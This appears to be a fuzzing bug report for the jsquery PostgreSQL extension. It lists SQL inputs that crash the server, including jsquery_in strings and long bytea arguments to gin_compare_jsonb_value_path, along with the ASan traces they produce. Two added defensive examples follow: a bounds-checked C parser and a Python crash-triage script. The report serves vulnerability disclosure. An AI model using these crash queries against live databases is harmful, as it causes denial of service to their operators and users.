Overview
While fuzzing jsquery using AFL++ and AddressSanitizer, I discovered a heap memory buffer overflow problem and some SQLs that could crash the PostgreSQL server. This may lead to Denial of Service (DoS) or memory safety violations depending on environment constraints.
Environment
OS: Ubuntu 22.04.5 LTS (x64)
PostgreSQL: 18.0 (./configure --enable-cassert --enable-debug CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g -O1 -fsanitize-recover=address" LDFLAGS="-fsanitize=address" CC=gcc-11 CXX=g++-11), also replicable when compiled with GCC 13.3.0
Extension jsquery: 3073aeb
Extension compilation: CC=afl-clang-fast COPT=-g -O2 -fgnu89-inline -fgnu89-inline -fsanitize=address -fno-omit-frame-pointer (also replicable when compiled with GCC 13.3.0)
AFL++ version: https://github.com/aflplusplus/aflplusplus bf2eac470804df48a1bca6a78d4dd6c71968a556
PostgreSQL setup:
- compile, install
- initdb -D xxx
- install the extension
- createdb test
- create extension jsquery (on the test database)
- start fuzzing, feed SQLs
- e.g., SELECT public.jsquery_in('/u=.,x');
- ...
Affected Code
jsquery_io.c
jsquery_scan.l
jsquery_gram.y
jsonb_gin_ops.c
jsquery_support.c
Possible SQLs that Trigger the Problem
SELECT public.jsquery_in('/u=.,x'); -- crash
SELECT public.jsquery_in('#/T'); -- crash
SELECT public.jsquery_le(public.jsquery_in('(/3M0'),public.jsquery_in('@')); -- crash
-- It seems that if the first character of the argument to jsquery_in is /, #, @, ( (and others), postgres crashes
SELECT public.gin_compare_jsonb_value_path('\x00C5603C4015B6B6D6922683B30BE89B89263AD046FC29F3D60D94B58F758D6B5A301D1970DFDA2283A66A88A14020C16203767335473D011BF0B65A483113'::bytea,'\xB898'::bytea);
SELECT public.gin_compare_jsonb_value_path('\x9F951BC241A7A69648AE1625EA00890FDA72EE18883F944543BCFFB3DA77DC6EF0F648F6F415ADD20891C7028EEB15F648DD36852115FC3DFD3EDA9DC4E88A3D993141AADCEBCCAF3381F179BEE5FBB30323772056DE6674401CD313F14BA32E76E867709882275B180244B16F5257E9C2AABD3639546377439152E9C2C0494381269B00516122003A468255A33DC2AA17DC7E2436647BDE7E51A0B436D686F021DCFCD3D99D32E747ECEA15C43F5CEE081CFAF23633EEB911D0315F414FC7F7619778E129D16FDD3DD1C984F766727E190182A10A539D52CE306F3804BE62FC67121739CEC341E93B66F2F68EB5A510AA3B03650BA9AF21DBD2563D2123E5C858AFC5C877F0733721427628D41F0408F1DC94B2550ED516C0232EA7EC995F9FF2BCB26D446A7A876E70EDED8E7536377BEC350A2F6F8E46D00C487774F5C9C8C7ADBA45A313A9C8BC2DA65332A30767CB51B5E02A69D71287F730602E72A3F3D2205E53A6B8A77C80D679BD2E8684BDAAF8DF426F71C32119388D71C851D50B24CAD018F297F465DB9EB23FA9FEA040D060896335005937BF9A83AA700656C11A1D95A4E20E499B6C3522A9E3F42D0D6EE5AB73BC67767DC91526AFF26695E6F565E539C1D5471F31C1BF01D31CF1766142BF5FCECC393A108DEC171D8D05226860BA7316ABBAE7AD92AEA07C6F7B61850E044F74C882DC787F450395A931'::bytea,'\x991E95'::bytea);
SELECT public.gin_compare_jsonb_value_path('\xBC428BE2A42978D759E21CA01BD06E3F932BC7D8A0F791C86320BF31020FE89AB6A98AA4A26AD6A487A725733994F8E533039BD9E85CB8574A38F1CBF721B141143618794AF60CEE80EA3A7CAAF62C3BBEC577632567CD6AA4A0CD'::bytea,'\x87'::bytea);
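The bytea-taking comparison above faults with a one-byte read just past an 8192-byte region, which is the classic symptom of a serialized value being walked by its declared lengths instead of by the bytes actually supplied. The defensive property such a finding points at is that every field of a caller-supplied buffer is length-checked before it is read. The following is an added example, not jsquery's code and not its real GIN key encoding: it parses a hypothetical tagged key format (tag byte, little-endian 32-bit length or value, payload; the layout, the `parse_key`/`compare_keys_checked` names and the `KEY_*` constants are all assumptions made here for illustration) through a single bounds-checked reader, so that truncated input, a length field larger than the input, an unknown tag or trailing bytes are rejected with `KEY_MALFORMED` rather than read beyond the buffer.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical serialized key layout, assumed for this example only (it is
 * not jsquery's real GIN key encoding):
 *   byte 0      tag: KEY_STRING or KEY_NUMERIC
 *   bytes 1..4  little-endian uint32: string length, or the int32 value
 *   bytes 5..   string payload (KEY_STRING only) */
#define KEY_STRING    0x01
#define KEY_NUMERIC   0x02
#define KEY_MALFORMED (-2)   /* compare result for inputs that fail validation */

typedef struct { const uint8_t *buf; size_t len; size_t pos; } reader_t;

typedef struct {
    uint8_t tag;
    const uint8_t *str;   /* KEY_STRING payload, not NUL-terminated */
    uint32_t slen;
    int32_t num;          /* KEY_NUMERIC value */
} keyval_t;

/* The only routine that touches the buffer: it compares the bytes still
 * available (len - pos) against the bytes wanted before handing out a
 * pointer, so a short or truncated input fails cleanly instead of being
 * read past the end of its allocation. */
static bool read_bytes(reader_t *r, size_t n, const uint8_t **out)
{
    if (r->len - r->pos < n)
        return false;
    *out = r->buf + r->pos;
    r->pos += n;
    return true;
}

static bool read_u32le(reader_t *r, uint32_t *out)
{
    const uint8_t *p;
    if (!read_bytes(r, 4, &p))
        return false;
    *out = (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
    return true;
}

/* Parse exactly one key from buf[0..len). Rejects a missing or unknown tag,
 * a length field that overruns the input, and trailing unread bytes. */
bool parse_key(const uint8_t *buf, size_t len, keyval_t *k)
{
    reader_t r = { buf, len, 0 };
    const uint8_t *p;
    uint32_t u;

    if (!read_bytes(&r, 1, &p))
        return false;
    k->tag = *p;
    switch (k->tag) {
    case KEY_STRING:
        if (!read_u32le(&r, &k->slen) || !read_bytes(&r, k->slen, &k->str))
            return false;
        break;
    case KEY_NUMERIC:
        if (!read_u32le(&r, &u))
            return false;
        k->num = (int32_t)u;
        break;
    default:
        return false;
    }
    return r.pos == r.len;   /* strict: nothing may be left unread */
}

/* Compare two serialized keys: -1/0/1, or KEY_MALFORMED when either input
 * fails validation, so the caller can report an error instead of comparing
 * garbage. Keys of different tags order by tag value. */
int compare_keys_checked(const uint8_t *a, size_t alen,
                         const uint8_t *b, size_t blen)
{
    keyval_t ka, kb;
    int c;

    if (!parse_key(a, alen, &ka) || !parse_key(b, blen, &kb))
        return KEY_MALFORMED;
    if (ka.tag != kb.tag)
        return ka.tag < kb.tag ? -1 : 1;
    if (ka.tag == KEY_NUMERIC)
        return (ka.num > kb.num) - (ka.num < kb.num);
    c = memcmp(ka.str, kb.str, ka.slen < kb.slen ? ka.slen : kb.slen);
    if (c == 0)
        c = (ka.slen > kb.slen) - (ka.slen < kb.slen);
    return (c > 0) - (c < 0);
}
```

Under a fuzzer such as the AFL++/ASan setup described above, a `compare_keys_checked` built this way turns an input like a one-byte bytea or a length field of 100 followed by a single byte into an ordinary `KEY_MALFORMED` return, which is exactly the behaviour the heap-buffer-overflow report shows to be missing.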
ASan trace
=================================================================
==4102318==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000037 (pc 0x7ff09f227140 bp 0x7ffe348b9d00 sp 0x7ffe348b8cc0 T0)
==4102318==The signal is caused by a READ memory access.
==4102318==Hint: address points to the zero page.
#0 0x7ff09f227140 in makeItemList /jsquery/jsquery_gram.y:196
#1 0x7ff09f227140 in jsquery_yyparse /jsquery/jsquery_gram.y:319
#2 0x7ff09f23821e in parsejsquery /jsquery/jsquery_scan.l:396
#3 0x7ff09f238999 in jsquery_in /jsquery/jsquery_io.c:171
#4 0x597e0691ac30 in ExecInterpExpr /postgresql-18.0/src/backend/executor/execExprInterp.c:977
#5 0x597e069069c1 in ExecInterpExprStillValid /postgresql-18.0/src/backend/executor/execExprInterp.c:2299
#6 0x597e06ca84fa in ExecEvalExprSwitchContext ../../../../src/include/executor/executor.h:440
#7 0x597e06ca84fa in evaluate_expr /postgresql-18.0/src/backend/optimizer/util/clauses.c:5014
#8 0x597e06cafbd0 in evaluate_function /postgresql-18.0/src/backend/optimizer/util/clauses.c:4521
#9 0x597e06cafbd0 in simplify_function /postgresql-18.0/src/backend/optimizer/util/clauses.c:4110
#10 0x597e06ca9633 in eval_const_expressions_mutator /postgresql-18.0/src/backend/optimizer/util/clauses.c:2595
#11 0x597e06ae7cf1 in expression_tree_mutator_impl /postgresql-18.0/src/backend/nodes/nodeFuncs.c:3572
#12 0x597e06caf844 in simplify_function /postgresql-18.0/src/backend/optimizer/util/clauses.c:4101
#13 0x597e06ca9633 in eval_const_expressions_mutator /postgresql-18.0/src/backend/optimizer/util/clauses.c:2595
#14 0x597e06ae7751 in expression_tree_mutator_impl /postgresql-18.0/src/backend/nodes/nodeFuncs.c:3486
#15 0x597e06ca896d in eval_const_expressions_mutator /postgresql-18.0/src/backend/optimizer/util/clauses.c:3729
#16 0x597e06ae7cf1 in expression_tree_mutator_impl /postgresql-18.0/src/backend/nodes/nodeFuncs.c:3572
#17 0x597e06ca896d in eval_const_expressions_mutator /postgresql-18.0/src/backend/optimizer/util/clauses.c:3729
#18 0x597e06caf38b in eval_const_expressions /postgresql-18.0/src/backend/optimizer/util/clauses.c:2270
#19 0x597e06c3e674 in preprocess_expression /postgresql-18.0/src/backend/optimizer/plan/planner.c:1284
#20 0x597e06c5b669 in subquery_planner /postgresql-18.0/src/backend/optimizer/plan/planner.c:904
#21 0x597e06c5d972 in standard_planner /postgresql-18.0/src/backend/optimizer/plan/planner.c:435
#22 0x597e06c5f8bd in planner /postgresql-18.0/src/backend/optimizer/plan/planner.c:295
#23 0x597e06f5c056 in pg_plan_query /postgresql-18.0/src/backend/tcop/postgres.c:900
#24 0x597e06f5c573 in pg_plan_queries /postgresql-18.0/src/backend/tcop/postgres.c:994
#25 0x597e06f5cf78 in exec_simple_query /postgresql-18.0/src/backend/tcop/postgres.c:1192
#26 0x597e06f5effe in PostgresMain /postgresql-18.0/src/backend/tcop/postgres.c:4766
#27 0x597e06f5277c in BackendMain /postgresql-18.0/src/backend/tcop/backend_startup.c:124
#28 0x597e06d3ae5a in postmaster_child_launch /postgresql-18.0/src/backend/postmaster/launch_backend.c:290
#29 0x597e06d43928 in BackendStartup /postgresql-18.0/src/backend/postmaster/postmaster.c:3587
#30 0x597e06d43928 in ServerLoop /postgresql-18.0/src/backend/postmaster/postmaster.c:1702
#31 0x597e06d469e6 in PostmasterMain /postgresql-18.0/src/backend/postmaster/postmaster.c:1400
#32 0x597e06a6d8f6 in main /postgresql-18.0/src/backend/main/main.c:227
#33 0x7ff0b242a1c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9)
#34 0x7ff0b242a28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a)
#35 0x597e062d7b94 in _start (/pgserver/bin/postgres+0x41eb94)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /jsquery/jsquery_gram.y:196 in makeItemList
==4102318==ABORTING
=================================================================
==2294928==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x525000007100 at pc 0x7ff0a2a0d729 bp 0x7ffe348ba2d0 sp 0x7ffe348ba2c0
READ of size 1 at 0x525000007100 thread T0
#0 0x7ff0a2a0d728 in compare_gin_key_value /jsquery/jsonb_gin_ops.c:669
#1 0x7ff0a2a0d0e3 in gin_compare_jsonb_value_path /jsquery/jsonb_gin_ops.c:752
#2 0x597e0691aebb in ExecInterpExpr /postgresql-18.0/src/backend/executor/execExprInterp.c:1001
#3 0x597e069069c1 in ExecInterpExprStillValid /postgresql-18.0/src/backend/executor/execExprInterp.c:2299
#4 0x597e06ca84fa in ExecEvalExprSwitchContext ../../../../src/include/executor/executor.h:440
#5 0x597e06ca84fa in evaluate_expr /postgresql-18.0/src/backend/optimizer/util/clauses.c:5014
#6 0x597e06cafbd0 in evaluate_function /postgresql-18.0/src/backend/optimizer/util/clauses.c:4521
#7 0x597e06cafbd0 in simplify_function /postgresql-18.0/src/backend/optimizer/util/clauses.c:4110
#8 0x597e06ca9633 in eval_const_expressions_mutator /postgresql-18.0/src/backend/optimizer/util/clauses.c:2595
#9 0x597e06ae7751 in expression_tree_mutator_impl /postgresql-18.0/src/backend/nodes/nodeFuncs.c:3486
#10 0x597e06ca896d in eval_const_expressions_mutator /postgresql-18.0/src/backend/optimizer/util/clauses.c:3729
#11 0x597e06ae7cf1 in expression_tree_mutator_impl /postgresql-18.0/src/backend/nodes/nodeFuncs.c:3572
#12 0x597e06ca896d in eval_const_expressions_mutator /postgresql-18.0/src/backend/optimizer/util/clauses.c:3729
#13 0x597e06caf38b in eval_const_expressions /postgresql-18.0/src/backend/optimizer/util/clauses.c:2270
#14 0x597e06c3e674 in preprocess_expression /postgresql-18.0/src/backend/optimizer/plan/planner.c:1284
#15 0x597e06c5b669 in subquery_planner /postgresql-18.0/src/backend/optimizer/plan/planner.c:904
#16 0x597e06c5d972 in standard_planner /postgresql-18.0/src/backend/optimizer/plan/planner.c:435
#17 0x597e06c5f8bd in planner /postgresql-18.0/src/backend/optimizer/plan/planner.c:295
#18 0x597e06f5c056 in pg_plan_query /postgresql-18.0/src/backend/tcop/postgres.c:900
#19 0x597e06f5c573 in pg_plan_queries /postgresql-18.0/src/backend/tcop/postgres.c:994
#20 0x597e06f5cf78 in exec_simple_query /postgresql-18.0/src/backend/tcop/postgres.c:1192
#21 0x597e06f5effe in PostgresMain /postgresql-18.0/src/backend/tcop/postgres.c:4766
#22 0x597e06f5277c in BackendMain /postgresql-18.0/src/backend/tcop/backend_startup.c:124
#23 0x597e06d3ae5a in postmaster_child_launch /postgresql-18.0/src/backend/postmaster/launch_backend.c:290
#24 0x597e06d43928 in BackendStartup /postgresql-18.0/src/backend/postmaster/postmaster.c:3587
#25 0x597e06d43928 in ServerLoop /postgresql-18.0/src/backend/postmaster/postmaster.c:1702
#26 0x597e06d469e6 in PostmasterMain /postgresql-18.0/src/backend/postmaster/postmaster.c:1400
#27 0x597e06a6d8f6 in main /postgresql-18.0/src/backend/main/main.c:227
#28 0x7ff0b242a1c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9)
#29 0x7ff0b242a28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a)
#30 0x597e062d7b94 in _start (/pgserver/bin/postgres+0x41eb94)
0x525000007100 is located 0 bytes to the right of 8192-byte region [0x525000005100,0x525000007100)
allocated by thread T0 here:
#0 0x7ff0b32b3ec7 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x597e07394511 in AllocSetContextCreateInternal /postgresql-18.0/src/backend/utils/mmgr/aset.c:444
#2 0x597e06d44930 in PostmasterMain /postgresql-18.0/src/backend/postmaster/postmaster.c:530
#3 0x597e06a6d8f6 in main /postgresql-18.0/src/backend/main/main.c:227
#4 0x7ff0b242a1c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9)
#5 0x7ff0b242a28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a)
#6 0x597e062d7b94 in _start (/pgserver/bin/postgres+0x41eb94)
SUMMARY: AddressSanitizer: heap-buffer-overflow /jsquery/jsonb_gin_ops.c:669 in compare_gin_key_value
Shadow bytes around the buggy address:
0x0a4a7fff8dd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0a4a7fff8de0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0a4a7fff8df0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0a4a7fff8e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0a4a7fff8e10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0a4a7fff8e20:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0a4a7fff8e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0a4a7fff8e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0a4a7fff8e50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0a4a7fff8e60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0a4a7fff8e70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
=================================================================
==999100==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x597e073aaab2 bp 0x7ffe348b8b40 sp 0x7ffe348b8b30 T0)
==999100==The signal is caused by a READ memory access.
==999100==Hint: this fault was caused by a dereference of a high value address (see register values below). Dissassemble the provided pc to learn which register was used.
#0 0x597e073aaab2 in GetMemoryChunkMethodID /postgresql-18.0/src/backend/utils/mmgr/mcxt.c:205
#1 0x597e073aaab2 in GetMemoryChunkContext /postgresql-18.0/src/backend/utils/mmgr/mcxt.c:709
#2 0x597e073acc60 in repalloc /postgresql-18.0/src/backend/utils/mmgr/mcxt.c:1554
#3 0x7ff0a1a30757 in addchar /jsquery/jsquery_scan.l:382
#4 0x7ff0a1a30757 in jsquery_yylex /jsquery/jsquery_scan.l:138
#5 0x7ff0a1a225b9 in jsquery_yyparse /jsquery/jsquery_gram.c:1595
#6 0x7ff0a1a3821e in parsejsquery /jsquery/jsquery_scan.l:396
#7 0x7ff0a1a38999 in jsquery_in /jsquery/jsquery_io.c:171
#8 0x597e0691ac30 in ExecInterpExpr /postgresql-18.0/src/backend/executor/execExprInterp.c:977
#9 0x597e069069c1 in ExecInterpExprStillValid /postgresql-18.0/src/backend/executor/execExprInterp.c:2299
#10 0x597e06ca84fa in ExecEvalExprSwitchContext ../../../../src/include/executor/executor.h:440
#11 0x597e06ca84fa in evaluate_expr /postgresql-18.0/src/backend/optimizer/util/clauses.c:5014
#12 0x597e06cafbd0 in evaluate_function /postgresql-18.0/src/backend/optimizer/util/clauses.c:4521
#13 0x597e06cafbd0 in simplify_function /postgresql-18.0/src/backend/optimizer/util/clauses.c:4110
#14 0x597e06ca9633 in eval_const_expressions_mutator /postgresql-18.0/src/backend/optimizer/util/clauses.c:2595
#15 0x597e06ae7cf1 in expression_tree_mutator_impl /postgresql-18.0/src/backend/nodes/nodeFuncs.c:3572
#16 0x597e06caf844 in simplify_function /postgresql-18.0/src/backend/optimizer/util/clauses.c:4101
#17 0x597e06ca9633 in eval_const_expressions_mutator /postgresql-18.0/src/backend/optimizer/util/clauses.c:2595
#18 0x597e06ae7751 in expression_tree_mutator_impl /postgresql-18.0/src/backend/nodes/nodeFuncs.c:3486
#19 0x597e06ca896d in eval_const_expressions_mutator /postgresql-18.0/src/backend/optimizer/util/clauses.c:3729
#20 0x597e06ae7cf1 in expression_tree_mutator_impl /postgresql-18.0/src/backend/nodes/nodeFuncs.c:3572
#21 0x597e06ca896d in eval_const_expressions_mutator /postgresql-18.0/src/backend/optimizer/util/clauses.c:3729
#22 0x597e06caf38b in eval_const_expressions /postgresql-18.0/src/backend/optimizer/util/clauses.c:2270
#23 0x597e06c3e674 in preprocess_expression /postgresql-18.0/src/backend/optimizer/plan/planner.c:1284
#24 0x597e06c5b669 in subquery_planner /postgresql-18.0/src/backend/optimizer/plan/planner.c:904
#25 0x597e06c5d972 in standard_planner /postgresql-18.0/src/backend/optimizer/plan/planner.c:435
#26 0x597e06c5f8bd in planner /postgresql-18.0/src/backend/optimizer/plan/planner.c:295
#27 0x597e06f5c056 in pg_plan_query /postgresql-18.0/src/backend/tcop/postgres.c:900
#28 0x597e06f5c573 in pg_plan_queries /postgresql-18.0/src/backend/tcop/postgres.c:994
#29 0x597e06f5cf78 in exec_simple_query /postgresql-18.0/src/backend/tcop/postgres.c:1192
#30 0x597e06f5effe in PostgresMain /postgresql-18.0/src/backend/tcop/postgres.c:4766
#31 0x597e06f5277c in BackendMain /postgresql-18.0/src/backend/tcop/backend_startup.c:124
#32 0x597e06d3ae5a in postmaster_child_launch /postgresql-18.0/src/backend/postmaster/launch_backend.c:290
#33 0x597e06d43928 in BackendStartup /postgresql-18.0/src/backend/postmaster/postmaster.c:3587
#34 0x597e06d43928 in ServerLoop /postgresql-18.0/src/backend/postmaster/postmaster.c:1702
#35 0x597e06d469e6 in PostmasterMain /postgresql-18.0/src/backend/postmaster/postmaster.c:1400
#36 0x597e06a6d8f6 in main /postgresql-18.0/src/backend/main/main.c:227
#37 0x7ff0b242a1c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9)
#38 0x7ff0b242a28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a)
#39 0x597e062d7b94 in _start (/pgserver/bin/postgres+0x41eb94)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /postgresql-18.0/src/backend/utils/mmgr/mcxt.c:205 in GetMemoryChunkMethodID
==999100==ABORTING
=================================================================
==3293476==ERROR: AddressSanitizer: SEGV on unknown address 0x524fbec30582 (pc 0x7ff09f247f39 bp 0x7ffe348baaf0 sp 0x7ffe348baab0 T0)
==3293476==The signal is caused by a READ memory access.
#0 0x7ff09f247f39 in jsqInitByBuffer /jsquery/jsquery_support.c:31
#1 0x7ff09f23a97a in printJsQueryItem /jsquery/jsquery_io.c:410
#2 0x7ff09f23a648 in printJsQueryItem /jsquery/jsquery_io.c
#3 0x7ff09f239efc in jsquery_out /jsquery/jsquery_io.c:447
#4 0x597e07340fba in FunctionCall1Coll /postgresql-18.0/src/backend/utils/fmgr/fmgr.c:1139
#5 0x597e073459de in OutputFunctionCall /postgresql-18.0/src/backend/utils/fmgr/fmgr.c:1685
#6 0x597e06312ce4 in printtup /postgresql-18.0/src/backend/access/common/printtup.c:360
#7 0x597e0692cd76 in ExecutePlan /postgresql-18.0/src/backend/executor/execMain.c:1728
#8 0x597e0692cd76 in standard_ExecutorRun /postgresql-18.0/src/backend/executor/execMain.c:366
#9 0x597e0692d032 in ExecutorRun /postgresql-18.0/src/backend/executor/execMain.c:303
#10 0x597e06f63fee in PortalRunSelect /postgresql-18.0/src/backend/tcop/pquery.c:921
#11 0x597e06f68767 in PortalRun /postgresql-18.0/src/backend/tcop/pquery.c:765
#12 0x597e06f5d120 in exec_simple_query /postgresql-18.0/src/backend/tcop/postgres.c:1273
#13 0x597e06f5effe in PostgresMain /postgresql-18.0/src/backend/tcop/postgres.c:4766
#14 0x597e06f5277c in BackendMain /postgresql-18.0/src/backend/tcop/backend_startup.c:124
#15 0x597e06d3ae5a in postmaster_child_launch /postgresql-18.0/src/backend/postmaster/launch_backend.c:290
#16 0x597e06d43928 in BackendStartup /postgresql-18.0/src/backend/postmaster/postmaster.c:3587
#17 0x597e06d43928 in ServerLoop /postgresql-18.0/src/backend/postmaster/postmaster.c:1702
#18 0x597e06d469e6 in PostmasterMain /postgresql-18.0/src/backend/postmaster/postmaster.c:1400
#19 0x597e06a6d8f6 in main /postgresql-18.0/src/backend/main/main.c:227
#20 0x7ff0b242a1c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9)
#21 0x7ff0b242a28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a)
#22 0x597e062d7b94 in _start (/pgserver/bin/postgres+0x41eb94)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /jsquery/jsquery_support.c:31 in jsqInitByBuffer
==3293476==ABORTING
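Triaging output like the four reports above is the usual next step after a fuzzing run: parse each report, keep only the crash stack (not the allocation stack ASan appends to heap reports), and bucket by the first frame inside the code under test, so that a fault reported inside PostgreSQL's memory manager (the `GetMemoryChunkMethodID` report) is still attributed to the jsquery frame `addchar` that called into it. The following is an added example, not part of this report or of jsquery; `parse_asan_reports`, `first_frame_under`, `crash_signature` and `dedupe_reports` are names chosen here, and `SAMPLE` is a constructed, condensed copy of the four reports with most frames trimmed.

```python
import re

# Constructed sample: the four reports above, condensed to a few frames each.
SAMPLE = """\
==4102318==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000037 (pc 0x7ff09f227140 bp 0x7ffe348b9d00 sp 0x7ffe348b8cc0 T0)
==4102318==The signal is caused by a READ memory access.
    #0 0x7ff09f227140 in makeItemList /jsquery/jsquery_gram.y:196
    #1 0x7ff09f227140 in jsquery_yyparse /jsquery/jsquery_gram.y:319
    #3 0x7ff09f238999 in jsquery_in /jsquery/jsquery_io.c:171
    #4 0x597e0691ac30 in ExecInterpExpr /postgresql-18.0/src/backend/executor/execExprInterp.c:977
SUMMARY: AddressSanitizer: SEGV /jsquery/jsquery_gram.y:196 in makeItemList
==4102318==ABORTING
==2294928==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x525000007100 at pc 0x7ff0a2a0d729 bp 0x7ffe348ba2d0 sp 0x7ffe348ba2c0
READ of size 1 at 0x525000007100 thread T0
    #0 0x7ff0a2a0d728 in compare_gin_key_value /jsquery/jsonb_gin_ops.c:669
    #1 0x7ff0a2a0d0e3 in gin_compare_jsonb_value_path /jsquery/jsonb_gin_ops.c:752
    #2 0x597e0691aebb in ExecInterpExpr /postgresql-18.0/src/backend/executor/execExprInterp.c:1001
0x525000007100 is located 0 bytes to the right of 8192-byte region [0x525000005100,0x525000007100)
allocated by thread T0 here:
    #0 0x7ff0b32b3ec7 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x597e07394511 in AllocSetContextCreateInternal /postgresql-18.0/src/backend/utils/mmgr/aset.c:444
SUMMARY: AddressSanitizer: heap-buffer-overflow /jsquery/jsonb_gin_ops.c:669 in compare_gin_key_value
==999100==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x597e073aaab2 bp 0x7ffe348b8b40 sp 0x7ffe348b8b30 T0)
    #0 0x597e073aaab2 in GetMemoryChunkMethodID /postgresql-18.0/src/backend/utils/mmgr/mcxt.c:205
    #1 0x597e073aaab2 in GetMemoryChunkContext /postgresql-18.0/src/backend/utils/mmgr/mcxt.c:709
    #2 0x597e073acc60 in repalloc /postgresql-18.0/src/backend/utils/mmgr/mcxt.c:1554
    #3 0x7ff0a1a30757 in addchar /jsquery/jsquery_scan.l:382
    #4 0x7ff0a1a30757 in jsquery_yylex /jsquery/jsquery_scan.l:138
SUMMARY: AddressSanitizer: SEGV /postgresql-18.0/src/backend/utils/mmgr/mcxt.c:205 in GetMemoryChunkMethodID
==999100==ABORTING
==3293476==ERROR: AddressSanitizer: SEGV on unknown address 0x524fbec30582 (pc 0x7ff09f247f39 bp 0x7ffe348baaf0 sp 0x7ffe348baab0 T0)
    #0 0x7ff09f247f39 in jsqInitByBuffer /jsquery/jsquery_support.c:31
    #1 0x7ff09f23a97a in printJsQueryItem /jsquery/jsquery_io.c:410
    #3 0x7ff09f239efc in jsquery_out /jsquery/jsquery_io.c:447
    #20 0x7ff0b242a1c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9)
SUMMARY: AddressSanitizer: SEGV /jsquery/jsquery_support.c:31 in jsqInitByBuffer
==3293476==ABORTING
"""

ERROR_RE = re.compile(r"^==(\d+)==ERROR: AddressSanitizer: (\S+)")
# Only symbolized frames ("... in func file:line"); bare "(lib+off)" frames are skipped.
FRAME_RE = re.compile(r"^\s*#\d+\s+0x[0-9a-fA-F]+\s+in\s+(\S+)\s+(\S+)")
SUMMARY_RE = re.compile(r"^SUMMARY: AddressSanitizer: (\S+) (\S+) in (\S+)")


def parse_asan_reports(text):
    """Split ASan output into reports: pid, error kind, crash-stack frames, SUMMARY.

    Frames of the allocation/free stacks that ASan appends to heap reports are
    not collected, so frames[0] is always the faulting frame.
    """
    reports, cur, in_crash_stack = [], None, False
    for line in text.splitlines():
        m = ERROR_RE.match(line)
        if m:
            cur = {"pid": int(m.group(1)), "kind": m.group(2), "frames": [], "summary": None}
            reports.append(cur)
            in_crash_stack = True
            continue
        if cur is None:
            continue
        if line.startswith(("allocated by", "freed by", "previously allocated")):
            in_crash_stack = False
            continue
        m = FRAME_RE.match(line)
        if m and in_crash_stack:
            cur["frames"].append((m.group(1), m.group(2)))
            continue
        m = SUMMARY_RE.match(line)
        if m:
            cur["summary"] = (m.group(1), m.group(2), m.group(3))
    return reports


def first_frame_under(report, prefix):
    """First crash-stack frame whose source path starts with prefix, or None."""
    for func, loc in report["frames"]:
        if loc.startswith(prefix):
            return (func, loc)
    return None


def crash_signature(report, prefix="/jsquery/"):
    """Bucket key: error kind plus the first frame inside the code under test,
    falling back to the SUMMARY location when no frame is under prefix."""
    own = first_frame_under(report, prefix)
    where = own[1] if own else (report["summary"][1] if report["summary"] else "unknown")
    return (report["kind"], where)


def dedupe_reports(reports, prefix="/jsquery/"):
    """Group report pids by signature, preserving first-seen order."""
    buckets = {}
    for r in reports:
        buckets.setdefault(crash_signature(r, prefix), []).append(r["pid"])
    return buckets


if __name__ == "__main__":
    for sig, pids in dedupe_reports(parse_asan_reports(SAMPLE)).items():
        print(f"{sig[0]:22s} {sig[1]:45s} pids={pids}")
```

Run over a directory of crash logs from a real campaign, the bucket keys are what you would file as separate issues; the third report illustrates why the signature uses the first frame under the extension's path rather than the SUMMARY line, which would otherwise file a jsquery lexer bug under PostgreSQL's `mcxt.c`.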
Expanded C source file
A preprocessed and macro-expanded version of the code can be found at the following links:
jsonb_gin_ops.c: https://github.com/gaoxiangliu/fuzzing-dbms-extensions-logs/blob/main/postgresql/jsquery/3073aepg18/jsonb_gin_ops.c
jsquery_io.c: https://github.com/gaoxiangliu/fuzzing-dbms-extensions-logs/blob/main/postgresql/jsquery/3073aepg18/jsquery_io.c
